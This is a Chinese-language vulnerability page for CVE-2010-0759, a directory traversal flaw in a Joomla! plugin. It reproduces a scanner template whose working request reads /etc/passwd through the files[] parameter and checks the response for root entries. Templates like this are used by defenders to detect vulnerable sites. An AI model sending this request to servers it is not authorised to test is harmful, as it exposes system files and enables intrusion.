CVE-2010-0759: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion

日期: 2025-08-01 | 影响软件: Joomla! | POC: 已公开

漏洞描述

A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.

PoC代码[已公开]

id: CVE-2010-0759

info:
  name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/11498
    - https://nvd.nist.gov/vuln/detail/CVE-2010-0759
    - http://www.exploit-db.com/exploits/11498
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/56380
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-0759
    cwe-id: CWE-22
    epss-score: 0.06605
    epss-percentile: 0.9082
    cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: greatjoomla
    product: scriptegrator_plugin
  tags: cve,cve2010,joomla,lfi,plugin,edb,greatjoomla

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022053f0992a4fcd5b67ba72411fbc721eb9ef6f775e0dd37d50a65a8814e7bb8b0c022100d4e0b504668bb148c7f537960a1375def8980ac0392621db32ef9c6d2193c71f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐